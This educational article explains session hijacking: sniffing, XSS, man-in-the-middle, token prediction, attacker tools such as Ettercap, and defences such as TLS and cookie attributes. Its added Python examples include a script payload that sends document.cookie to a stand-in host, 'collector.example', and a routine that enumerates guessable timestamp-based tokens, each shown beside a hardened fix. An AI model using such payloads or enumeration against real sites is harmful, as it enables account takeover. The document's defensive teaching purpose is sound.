Session hijacking is the theft of another user's active internet session, which allows the attacker to impersonate that user. Falling victim to it can be catastrophic, because the attacker can then perform any task that you, the victim, would be able to perform.
In this article I explain what session hijacking entails, and detail some of the more favoured methods for compromising a session token. I also discuss three of the tools most commonly used to perform such attacks and outline some prevention measures that you might implement, in either your home or place of business, in order to avoid becoming a victim of such an attack.
WHAT SESSION HIJACKING INVOLVES
At its most basic level, session hijacking involves the taking over of a victim's active internet session by covertly obtaining the victim's session token. Once the victim's session token has been accessed, the attacker can masquerade as the victim, and perform any tasks that the victim is authorized to perform.
The session token a hijacker needs is normally carried in a cookie or, less safely, in the URL itself; URLs end up in browser history, proxy and server logs and Referer headers, so a token placed there leaks far more easily. Most web applications authenticate the user only once, at login. From then on the session token alone stands in for the user's identity, so whoever presents it is treated as the user. Session hijacking takes advantage of this by intruding into the web session in real time, while it is still live. Whether such an intrusion is detected depends on both the technical knowledge of the victim and the specific nature of the attack.
ACTIVE AND PASSIVE ATTACKS
There are two broad forms of session hijack attack, known respectively as active and passive attacks. An active attack involves identifying, attacking and successfully taking over a live internet session. It is regarded as the more advanced of the two, because of the higher level of skill it requires.
A passive attack involves the attacker monitoring the traffic sent across the victim's network and, as such, is essentially an advanced form of network sniffing. The attacker gathers information, such as login credentials or the session token itself, and then uses it to authenticate in a separate session.
COMPROMISING SESSION TOKENS
Common methods of stealing a valid session token are session sniffing, client-side attacks, man-in-the-middle attacks and session prediction. Each is discussed below.
Session sniffing is the easiest approach to capturing a valid session token. It involves monitoring the network traffic between the victim's terminal and the server the victim is connecting to. Where that traffic is unencrypted, as with plain HTTP over an open wireless network or a shared LAN segment, the attacker can easily gather a wide range of sensitive data, including the session token itself as well as login details for various websites and services. Sniffing yields nothing useful from a properly encrypted connection, which is why encryption (discussed under Prevention) is the primary defence against it.
Another common means of gaining access to a session token, and other personal data, is a client-side attack. One of the most common client-side attacks involves infecting the victim's terminal with malware such as a Trojan or virus. This gives the attacker access to the target's data, including the browser's cookie store, and allows the copying, editing and deletion of any file on the target's computer. Cross-site scripting (XSS) is another example of a client-side attack. In the reflected form described here, the attacker sends the victim a URL pointing at a vulnerable site that echoes part of the URL into its page without escaping it. If the target follows the link, the injected JavaScript runs in the victim's browser with the site's own origin and, if the session cookie is readable from script, sends a copy of it to the attacker. (Stored XSS, where the script is saved on the site itself, works the same way without the victim having to click a crafted link.) Marking the session cookie HttpOnly keeps it out of reach of document.cookie, although injected script can still issue requests in the victim's name.
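The reflected XSS just described, as an added example that is not part of the original article: a search handler that echoes the query parameter into its page, first as written by a careless developer and then with the query HTML-escaped. The site "shop.example", the attacker host "collector.example" and the payload are all constructed for this illustration.

```python
"""Reflected XSS: a search handler that echoes the query, vulnerable and hardened.

Constructed example: "shop.example" is the vulnerable site and
"collector.example" the attacker's host; neither is a real service.
"""
import html
from urllib.parse import parse_qs, quote, urlparse

# The kind of payload the article describes: script that ships the victim's
# cookies to the attacker's host. It only works if the session cookie is
# readable from script, i.e. it lacks the HttpOnly attribute.
PAYLOAD = '<script>new Image().src="http://collector.example/?c="+document.cookie</script>'

# What the victim is tricked into clicking: the payload URL-encoded into the
# "q" parameter of the vulnerable search page.
MALICIOUS_URL = "http://shop.example/search?q=" + quote(PAYLOAD)


def _query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, or "" if absent."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Echoes the raw query into the page: whatever markup the attacker put
    in the URL becomes part of the document and runs with the site's origin."""
    q = _query_param(url, "q")
    return f"<h1>Results for {q}</h1>"


def render_hardened(url: str) -> str:
    """Same page, but the query is HTML-escaped before it enters the markup,
    so '<', '>', '&' and quotes are rendered as text rather than parsed."""
    q = _query_param(url, "q")
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def contains_active_script(page: str) -> bool:
    """Crude check used here to show the difference: does the rendered HTML
    still contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(MALICIOUS_URL)
    print(render_vulnerable(MALICIOUS_URL))   # script tag survives
    print(render_hardened(MALICIOUS_URL))     # &lt;script&gt; ... shown as text
```

Escaping is context-specific: html.escape is correct for HTML text and quoted attribute values, but a value placed inside a script block or a URL needs that context's own encoding, which is why an auto-escaping template engine is the usual fix rather than hand-placed escape calls. Even with the page fixed, the HttpOnly attribute on the session cookie is what limits the damage of the next XSS bug.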
A man-in-the-middle (MITM) attack occurs when the attacker intercepts the communications between two systems and assumes the role of a proxy between them. The attacker does this by splitting the connection into two new links: one between the server and the attacker, and the other between the attacker and the victim. On a LAN this is typically achieved by ARP spoofing, which tricks the victim's machine into sending its traffic to the attacker's address instead of the gateway's. Acting as a proxy for all communications between the two parties, the attacker can read and modify the data sent between the victim and the server, including the session token. Against a TLS connection this only works if the attacker can present a certificate the victim's browser accepts, so a user who clicks through a certificate warning hands the session over.
A session prediction attack, which is, in my opinion, the most amateurish of the attack methods, involves the attacker trying to guess the active session's token. The attacker does this by analysing how the session token is generated and what, if anything, protects it. Once an attacker understands this process, they can predict a valid token value and gain access to that session. Some simple, highly vulnerable session tokens are built from predictable information such as timestamps, usernames or sequential counters, sometimes lightly disguised with an encoding such as Base64. Such token assignment schemes are extremely dangerous and should be avoided: session tokens must come from a cryptographically secure random generator with enough randomness (OWASP's guidance is at least 64 bits) that guessing is infeasible.
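To make the prediction attack concrete, here is an added example (not code from the article): a weak scheme that Base64-encodes the username and login timestamp, the two steps an attacker takes against it, and the CSPRNG-based replacement. The server-side session store, the user names and the login time are all constructed for the illustration.

```python
"""Session prediction: a guessable token scheme beside a CSPRNG-based one.

Constructed example. 'alice', 'bob' and the login time are made-up values,
and the weak scheme is a deliberately bad design, not any real product's.
"""
from __future__ import annotations

import base64
import hashlib
import secrets


class SessionStore:
    """Minimal server-side session table keyed by SHA-256(token), so raw
    tokens never sit in the store and lookups are hash-indexed."""

    def __init__(self) -> None:
        self._sessions: dict[bytes, str] = {}

    @staticmethod
    def _key(token: str) -> bytes:
        return hashlib.sha256(token.encode()).digest()

    def create(self, username: str, token: str) -> None:
        self._sessions[self._key(token)] = username

    def lookup(self, token: str) -> str | None:
        return self._sessions.get(self._key(token))


# --- Weak scheme: token = urlsafe_base64("username:unix_login_time") ----------
def weak_token(username: str, login_time: int) -> str:
    return base64.urlsafe_b64encode(f"{username}:{login_time}".encode()).decode()


def decode_weak_token(token: str) -> tuple[str, int]:
    """Step one of a prediction attack: work out how tokens are built.
    A single captured token is enough to reveal this layout."""
    username, ts = base64.urlsafe_b64decode(token).decode().split(":", 1)
    return username, int(ts)


def predict_weak_token(store: SessionStore, username: str,
                       approx_login_time: int, window: int) -> tuple[str | None, int]:
    """Step two: the attacker knows the victim's username and roughly when
    they logged in, and asks the server to validate each candidate.
    Returns (token, guesses) on success or (None, guesses) on failure."""
    guesses = 0
    for delta in range(-window, window + 1):
        guesses += 1
        candidate = weak_token(username, approx_login_time + delta)
        if store.lookup(candidate) == username:
            return candidate, guesses
    return None, guesses


# --- Strong scheme: 256 bits from the OS CSPRNG, nothing user- or time-derived --
def strong_token() -> str:
    return secrets.token_urlsafe(32)


def demo() -> dict:
    store = SessionStore()
    victim_login = 1_700_000_000            # constructed login time (Unix seconds)

    weak = weak_token("alice", victim_login)
    store.create("alice", weak)
    # The attacker's estimate of the login time is 37 s off; they try +-120 s.
    guessed, tries = predict_weak_token(store, "alice", victim_login + 37, 120)

    strong = strong_token()
    store.create("bob", strong)
    # The same enumeration is useless against a random token: there is no
    # timestamp to walk through, and 2**256 candidates is out of reach.
    not_guessed, _ = predict_weak_token(store, "bob", victim_login + 37, 120)

    return {
        "layout": decode_weak_token(weak),
        "weak_guessed": guessed == weak,
        "tries": tries,
        "strong_guessed": not_guessed is not None,
        "strong_len": len(strong),
    }


if __name__ == "__main__":
    print(demo())
```

The weak token's guess space, given a known username and a two-minute window, is 241 candidates, under eight bits of uncertainty; the strong token offers 256. Hashing tokens before storing them is a separate but worthwhile habit, since a leaked session table then yields nothing directly replayable.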
TOOLS EMPLOYED BY ATTACKERS
There are a variety of applications that can be used to sniff networks and hijack active sessions. Three of the most commonly employed are as follows.
Juggernaut is a network sniffer developed for Linux and first published in Phrack in 1997. It allows the user to monitor all network traffic or, alternatively, to scan traffic for specific keywords such as usernames, website addresses or passwords. Juggernaut also lists all active network sessions and offers the option of hijacking any of them. It is free to use, and installation guides are available on a variety of websites; a basic Google search should be sufficient to find one.
A second application is T-Sight, a network monitoring and session hijacking tool designed for the Microsoft Windows environment. T-Sight allows the user to monitor all data passing over a network; once a session ID has been captured, a single button click hijacks the session. In an attempt to prevent T-Sight from being used for illegal purposes, Engarde, the company that produces and distributes it, licenses the software only to pre-determined IP addresses.
Finally, Ettercap is a free and open-source network security tool for performing man-in-the-middle attacks over local area networks (LANs), typically by ARP spoofing. Ettercap runs on a range of operating systems, including Linux, Mac OS X, Solaris and Microsoft Windows, and was ranked number 11 on the SecTools.org Top 100 Network Security Tools list of 2006. It is one of the most advanced sniffing tools available: it can analyse traffic using a variety of methods and locate the information of interest quickly. While Ettercap is arguably the most advanced of the three applications outlined here, it has known stability issues on Windows. It runs reliably on Kali, a Linux distribution designed for penetration testers.
PREVENTING AN ATTACK
The following preventative measures can be taken to minimise the risk of being subjected to a session hijacking attack.
ENCRYPTION
Encrypting the data that passes between the two parties, including the session token, significantly reduces the chances of a successful session hijack. This is done with a cryptographic protocol, in practice Transport Layer Security (TLS); its predecessor, Secure Sockets Layer (SSL), is obsolete and should be disabled on servers rather than relied upon. Encryption is heavily relied upon by most web-based banking applications and e-commerce services, including eBay and Freelancer. A relatively effortless way for a user to insist on it was the browser add-on HTTPS Everywhere, which the Tor Project also bundled with Tor Browser; that add-on has since been retired because the major browsers now ship an equivalent HTTPS-only mode, which is the setting to enable today. Note that while encryption dramatically reduces the effectiveness of sniffing attacks, a session hijack is still possible if the attacker obtains the token by another route, such as XSS or malware on the client, and TLS only protects the token if the cookie is marked Secure so that the browser never sends it over plain HTTP.
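TLS protects the token in transit only if the browser never sends it in the clear and injected script cannot read it, and both of those are decided by the attributes the server puts on the Set-Cookie header. The following auditor is an added example, not part of the original article; it runs over two constructed headers (neither captured from a real site) and lists what each is missing, then builds a header that passes.

```python
"""Audit Set-Cookie headers for the attributes that keep a session token away
from the attacks described above.

Constructed example: both headers below are made up, not captured from any
real site, and the cookie names are illustrative.
"""
from __future__ import annotations

# A typical unhardened response header and a hardened one (both constructed).
WEAK_HEADER = "Set-Cookie: PHPSESSID=rbph7j2m; Path=/"
HARDENED_HEADER = (
    "Set-Cookie: __Host-session=c2FtcGxlLXRva2VuLW5vdC1yZWFs; "
    "Path=/; Secure; HttpOnly; SameSite=Lax"
)


def parse_set_cookie(header: str) -> tuple[str, str, dict[str, str | None]]:
    """Split a Set-Cookie line into (name, value, attributes).
    Attribute names are lower-cased; flag attributes map to None."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str | None] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else None
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header: str) -> list[str]:
    """Return a list of findings; an empty list means the cookie carries
    every attribute this check looks for."""
    name, value, attrs = parse_set_cookie(header)
    findings: list[str] = []
    if "secure" not in attrs:
        findings.append("missing Secure: the browser also sends the token over plain "
                        "HTTP, so a sniffer or a downgrading MITM can read it")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: injected script can read the token "
                        "via document.cookie")
    if (attrs.get("samesite") or "").lower() not in ("lax", "strict"):
        findings.append("missing SameSite=Lax/Strict: set it explicitly rather "
                        "than relying on browser defaults for cross-site requests")
    if len(value) < 16:
        findings.append("short value: under 16 characters is a warning sign of a "
                        "low-entropy session id")
    if name.startswith("__Host-") and (
        "secure" not in attrs or attrs.get("path") != "/" or "domain" in attrs
    ):
        findings.append("__Host- prefix requires Secure, Path=/ and no Domain")
    elif name.startswith("__Secure-") and "secure" not in attrs:
        findings.append("__Secure- prefix requires the Secure attribute")
    return findings


def hardened_header(name: str, token: str) -> str:
    """Build a Set-Cookie line that passes the audit above. The __Host- prefix
    makes the browser itself enforce Secure, Path=/ and no Domain."""
    return f"Set-Cookie: __Host-{name}={token}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for h in (WEAK_HEADER, HARDENED_HEADER):
        print(h)
        for f in audit_session_cookie(h) or ["ok"]:
            print("  -", f)
```

Run it against the headers a real deployment returns (curl -I will show them) before and after a change; the length check is only a heuristic, since the real requirement is how the value is generated, which the header alone cannot reveal.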
CONNECTIONS
Another way to mitigate the risk of having a session hijacked is to limit the number of remote connections into your network. This can be done with a Virtual Private Network (VPN) server, which enables authorised users to connect to your network from an offsite location while adding an extra layer of protection between those users and the network. Combined with TLS on the applications themselves, a VPN server acting as an intermediary between your users' personal terminals and your network stops a sniffer on a hotel or coffee-shop network from seeing their traffic. It does not, however, protect the web session itself: a token stolen through XSS or malware on the user's machine works just as well over the VPN, so the VPN complements rather than replaces the application-level measures.
ANTI-VIRUS SOFTWARE
Making sure that up-to-date anti-virus software is installed on networked computers will help prevent the network from being infected by malware. As discussed, malware can be used by an attacker to steal a session token; anti-virus catches known families but should not be counted on against targeted or novel samples.
EMPLOYEE EDUCATION
Educating employees in safe internet use can be boring but is nonetheless highly effective in preventing a range of attacks. Teaching your employees about the different types of malware, how it spreads (spam email, infected files etc.) and proper browsing habits will help prevent infections that could spread across your network and wreak havoc.
CONCLUSION
Whether you are operating on your personal, home, or business network, the threat of session hijacking attacks is very real. While a successful attack can be devastating to you and your business, the measures outlined in this article can assist in reducing the likelihood of an attack being effective.